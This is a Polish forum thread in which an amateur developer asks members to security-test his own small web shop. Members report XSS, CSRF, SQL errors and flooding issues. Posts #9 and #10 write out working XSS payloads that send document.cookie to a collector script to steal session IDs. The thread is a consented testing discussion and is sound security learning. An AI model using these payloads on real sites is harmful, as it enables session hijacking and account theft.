Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 14

Temat: Testowanie bezpieczeństwa aplikacji internetowej

  1. #1
    Zarejestrowany
    Nov 2007
    Postów
    54

    Domyślnie Testowanie bezpieczeństwa aplikacji internetowej

    Witam. Chciałbym się dowiedzieć od forumowiczów czy byłby ktoś skłonny przetestować aplikację internetową, w głównej mierze pod względem bezpieczeństwa, jak również od strony funkcjonalności. Aplikacja może stanowić podstawę dalszych działań, dlatego teraz pragnąłbym wiedzieć na co zwrócić szczególną uwagę przy projektowaniu.
    Jeżeli znaleźliby się ochotnicy, proszę o informację na forum. Wtedy podam adres strony.
    W kwestii formalnej, ja jestem autorem tej aplikacji i w razie wątpliwości jestem w stanie umieścić informację na głównej stronie wraz z notą o testowaniu aplikacji i linkiem do tego forum.

    Ze wszelkie uwagi z góry dziękuję.

  2. #2
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Dlaczego w pierwszym poscie nie podasz linka? Chetnie bym wszedl przetestowal, ale zeby specjalnie sie teraz z Toba na pw w tym celu kontaktowac to mi sie nie chce..
    http://gogulas.yoyo.pl/h.gif

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    W wolnej chwili moglbym zajrzec (tylko nie wiem kiedy to bedzie - jak potrzebujesz juz to ja odpadam) ale do tego dochodza wymagania formalne - pisemne upowaznienie do przeprowadzenia testow (wystawione przez wlasciciela serwisu a nie autora strony), potwierdzenie od ISP/hostingu ze wiedza o takich testach itd. Bez zabezpieczenia formalnego znalezienie kogokolwiek powaznego bedzie trudne - nikt nie podlozy swojej glowy pod testy 'na gebe' albo pod cos co zostalo uzgodnione na forum.

    Poszukaj prosze tu na forum - pisalem jakie sa zagrozenia i jakie gwarancje sa minimum wymaganym do tego aby cokolwiek prawidlowo zaczac. Bez zadnych formalnych ustalen na pismie mozesz co najwyzej zaprosic ludzi do testowania funkcjonalnosci - wylapywania literowek, popsutych linkow itd. Jesli ktokolwiek z nich zrobi cos nie tak i rozwali serwer to zlamal prawo i przegra w sadzie - po to do testow penetracyjnych wymaga sie takich zabezpieczen formalnych.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    Zarejestrowany
    Nov 2007
    Postów
    54

    Domyślnie

    Cytat Napisał gogulas Zobacz post
    Dlaczego w pierwszym poscie nie podasz linka?
    Dlatego, że jeszcze były przeprowadzane pewne zmiany.

    Cytat Napisał tqm Zobacz post
    ... do tego dochodza wymagania formalne - pisemne upowaznienie do przeprowadzenia testow (wystawione przez wlasciciela serwisu a nie autora strony), potwierdzenie od ISP/hostingu ze wiedza o takich testach itd. Bez zabezpieczenia formalnego znalezienie kogokolwiek powaznego bedzie trudne - nikt nie podlozy swojej glowy pod testy 'na gebe' albo pod cos co zostalo uzgodnione na forum.
    Ponieważ jest to prosta aplikacji, całkowicie amatorska i niekomercyjna, umieszczona na darmowym hostingu, różnego typu upoważnienia wymagałyby zbyt dużego "zachodu" z mojej strony. Dlatego proszę tylko (w miarę możliwości czasowych) o sprawdzenie funkcjonalności, a ponieważ jest to forum o tematyce bezpieczeństwa, o przetestowanie z uwzględnieniem kwestii bezpieczeństwa.

    Nie proszę o przeprowadzenie gruntownego audytu bezpieczeństwa bo nie byłoby to adekwatne do tego typu aplikacji.

    Cytat Napisał tqm Zobacz post
    W wolnej chwili moglbym zajrzec (tylko nie wiem kiedy to bedzie - jak potrzebujesz juz to ja odpadam)
    Tak jak pisałem wcześniej, jest to aplikacja niekomercyjna i stworzona tylko w celach naukowych i może pozostać tak długo, jak będzie rozwijana. Dodatkowo kody stron mogę zostać udostępnione na prośbę użytkowników.

    Oto adres: http://www.coefficient.yoyo.pl/

  5. #5
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    z tego co ja zauważyłem to chyba zmienna search jest jakoś dziwnie filtrowana bo czasami wyswietla mi znak " nad napisem nic nie znaleziono

  6. #6
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    @tqm
    Ty masz jakies zle doswiadczenia z przeszlosci? Nie no, takie podejscie to poprostu tchorzostwo ;/



    wiec tak, login.php - zalkowicie zrabales, po co to err? Nie wiem co sie dzieje z post_referer.

    naglowek location w http - powinien zawieraz pelny url, od http.

    moge zalozyc miliard kat, a skrypt ladnie doda all do bazy.

    Użytkownik 'xss' został dopisany do bazy danych, xss. Ponadto wywala backslashe. tak samo po zalogowaniu, gdzie jest tylko 'Witaj'.

    cos z baza przy pokaz dane jak w nazwie / hasle bedzie '

    pokaz/ukryj dane robi niepotrzebne zapytania, tak samo cala stronka. A wiekszasc to 404 not found.

    kontakt - gratz, (dot)/(at) a w hrefie jest caly mail

    sesje - tez mozna wygenerowac ile sie chce, ja bym to inaczej rozwiazal.

    credential.php nie powinien sie (chyba?) wyswietlac jak sesja jest bledna

    logout.php - csrf

    cos zchrzaniles z htaccess, jak przekierowjesz pliki php ktorych niema, wywala 502 bad getaway.

    automatyczne wykonanie skrpytu przy zakupie, standardowy blad...

    backslashe przy komentarzach i zbedne pole dodaj. Ofc nick mozna sobie wybrac, a tam juz jest xss. Wspomnialem ze mozna dodac 300GB komentow?

    You have an error in your SQL syntax; - komentarze

    po wylogowaniu resetuje sie rachunek


    ehh, lepiej nie rob uploadu jak masz zamiar
    no i naucz sie php, bo takie bledy to sie popelnia albo jak sie pisze za kase (szybko i chujowo) albo jak sie nie ma pojecia o laczeniu php z sql.

  7. #7
    Zarejestrowany
    Nov 2007
    Postów
    54

    Domyślnie

    Cytat Napisał ironwall Zobacz post
    z tego co ja zauważyłem to chyba zmienna search jest jakoś dziwnie filtrowana bo czasami wyswietla mi znak " nad napisem nic nie znaleziono
    Nie potrafię określić czym to jest spowodowane. Mógłbyś podać co wpisałeś?
    Cytat Napisał 31337 Zobacz post
    wiec tak, login.php - zalkowicie zrabales, po co to err? Nie wiem co sie dzieje z post_referer.
    Bo takie coś wpadło mi do głowy. Są tego jakieś konsekwencje?
    Referer jest po to aby wrócić do strony z produktem w przypadku zakupu lub dodania komentarzu.
    Cytat Napisał 31337 Zobacz post
    naglowek location w http - powinien zawieraz pelny url, od http.
    Ma to jakieś znaczenie dla bezpieczeństwa, czy taka jest praktyka?
    Cytat Napisał 31337 Zobacz post
    moge zalozyc miliard kat, a skrypt ladnie doda all do bazy. ...
    Wspomnialem ze mozna dodac 300GB komentow?
    Jeśli masz taką ochotę, nie widzę przeszkód, jeśli nie przekroczysz limitu danych w bazie. Czy to jest źle?
    Cytat Napisał 31337 Zobacz post
    Użytkownik 'xss' został dopisany do bazy danych, xss. Ponadto wywala backslashe. tak samo po zalogowaniu, gdzie jest tylko 'Witaj'.

    cos z baza przy pokaz dane jak w nazwie / hasle bedzie ...
    backslashe przy komentarzach
    Zgadza się. Nie sprawdziłem, że jest włączona dyrektywa magic_quotes_gpc na serwerze hostingowym.
    Cytat Napisał 31337 Zobacz post
    pokaz/ukryj dane robi niepotrzebne zapytania, tak samo cala stronka. A wiekszasc to 404 not found.
    Musi robić zapytanie ponieważ nie wszystko znajduje się w zmiennych sesji. Stąd te odwołania poprzez Ajax.
    Cytat Napisał 31337 Zobacz post
    kontakt - gratz, (dot)/(at) a w hrefie jest caly mail ...
    automatyczne wykonanie skrpytu przy zakupie, standardowy blad... ...
    zbedne pole dodaj ...
    You have an error in your SQL syntax; - komentarze
    Niestety tych uwag nie potrafię zrozumieć. Mógłbyś je odrobinę rozjaśnić?
    Cytat Napisał 31337 Zobacz post
    sesje - tez mozna wygenerowac ile sie chce, ja bym to inaczej rozwiazal.
    Sesje nie są tworzone na nowo, tylko ich identyfikatory są regenerowane (wtedy kiedy istnieje bieżąca sesja, a użytkownik się loguje).
    Cytat Napisał 31337 Zobacz post
    credential.php nie powinien sie (chyba?) wyswietlac jak sesja jest bledna
    Jak najbardziej. Słuszna uwaga.
    Cytat Napisał 31337 Zobacz post
    logout.php - csrf
    Prosiłbym o podanie przykładu w jaki sposób można wykorzystać ten typ ataku.
    Cytat Napisał 31337 Zobacz post
    cos zchrzaniles z htaccess, jak przekierowjesz pliki php ktorych niema, wywala 502 bad getaway.
    Nie korzystam z htaccess. Jednak nie mam pojęcia dlaczego tak się dzieje. Sprawdziłem inne strony na tej domenie i też się tak dzieje.
    Cytat Napisał 31337 Zobacz post
    Ofc nick mozna sobie wybrac, a tam juz jest xss.
    Zgadza się. Duże niedopatrzenie z mojej strony.
    Cytat Napisał 31337 Zobacz post
    po wylogowaniu resetuje sie rachunek
    Nie widzę potrzeby aby zachowywać stanu rachunku. Aplikacja jest na tyle prowizoryczna, że nie ma nawet procesu płatności. Poza tym wydaje mi się, że logiczne jest, że po zrealizowaniu zakupów (i w domyśle dokonaniu płatności), klient nie musi płacić dodatkowo za poprzednio zakupione przedmioty.
    Cytat Napisał 31337 Zobacz post
    ehh, lepiej nie rob uploadu jak masz zamiar
    no i naucz sie php, bo takie bledy to sie popelnia albo jak sie pisze za kase (szybko i chujowo) albo jak sie nie ma pojecia o laczeniu php z sql.
    Dziękuję za uwagi, postaram dostosować się do nich. Proszę również o staranie się unikać nieprzyzwoitych wyrażeń. Nie brzmią i nie wyglądają one najlepiej.

  8. #8
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    wpisz w szukajce </script>
    ale chyba to nie powoduje zagrożenia dla strony bo próbowałem inne kombinacje i nie działają gdyby działały to co innego bo wtedy można naprzyklad xssa znaleźć albo coś innego ale tak to myślę że niema to większego znaczenia
    pozdrawiam

    edit..wlasnie zauwazylem ze filtruje wszystkie inne tagi tylko nie </script>

  9. #9
    Zarejestrowany
    Nov 2007
    Postów
    54

    Domyślnie

    Cytat Napisał ironwall Zobacz post
    wpisz w szukajce </script>
    ale chyba to nie powoduje zagrożenia dla strony bo próbowałem inne kombinacje i nie działają gdyby działały to co innego bo wtedy można naprzyklad xssa znaleźć albo coś innego ale tak to myślę że niema to większego znaczenia
    pozdrawiam

    edit..wlasnie zauwazylem ze filtruje wszystkie inne tagi tylko nie </script>
    Niby nic a jednak coś powoduje. Proszę wpisać następujący kod
    Kod:
    </script><script>document.write('<img src="http://coefficient.yoyo.pl/xss.php?PHPSESSID='+document.cookie+'">');alert('OK')</script>
    a następnie wejść do pliku xss.txt znajdującego się na serwerze. Tam zobaczycie identyfikatory bieżacych sesji. Dodatkowo można zrobić "obrazek" niewidocznym poprzez zastosowanie stylów i pobrać go z dowolnego serwera. Jutro postaram się to poprawić.
    Gratulacje dla ironwall'a. Pozdrawiam.
    Ostatnio edytowane przez coefficient : 12-02-2007 - 03:07

  10. #10
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    troche sie bawiłem tą stroną a dokladnie tym xssem zeby zapisywał gdzies cookiesy no i to nie jest łatwe w tym przypadku przynajmiej dla mnie
    ten kod co podałeś to nie działa
    ten na dole już prędzej coś robi ale i tak nie zapisuje cookiesów tylko zwykly tekst escape(document.cookie); naprawde dla mnie specyficzna witryna to jest
    jak by komuś udało sie napisać taki kodzik znaczy spreferowac zmienną w urlu
    to niech napisze bo ciekawy jestem sam jak to powinno wyglądać

    Kod:
    http://www.coefficient.yoyo.pl/base.php?search=</script><script>document.write("</script><img src=http://www.coefficient.yoyo.pl/xss.php?PHPSESSID=%2Bescape(document.cookie);>");</script>

Strona 1 z 2 12 OstatniOstatni

Podobne wątki

  1. Polityka bezpieczeństwa - norma
    By matek in forum Nowości techniczne
    Odpowiedzi: 5
    Autor: 12-12-2016, 10:02
  2. Uruchomienie 2 aplikacji (ominiecie zabezpiczenia)
    By wonsz in forum Newbie - dla początkujących!
    Odpowiedzi: 4
    Autor: 11-28-2007, 10:47
  3. Odpowiedzi: 6
    Autor: 07-17-2007, 19:58
  4. zabezpieczenia aplikacji webowej asp
    By arqs_mixer in forum Security
    Odpowiedzi: 3
    Autor: 04-10-2007, 12:09
  5. Problem bezpieczeństwa forum
    By I_v0 in forum Pomysły/Sugestie
    Odpowiedzi: 3
    Autor: 06-06-2006, 18:41

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj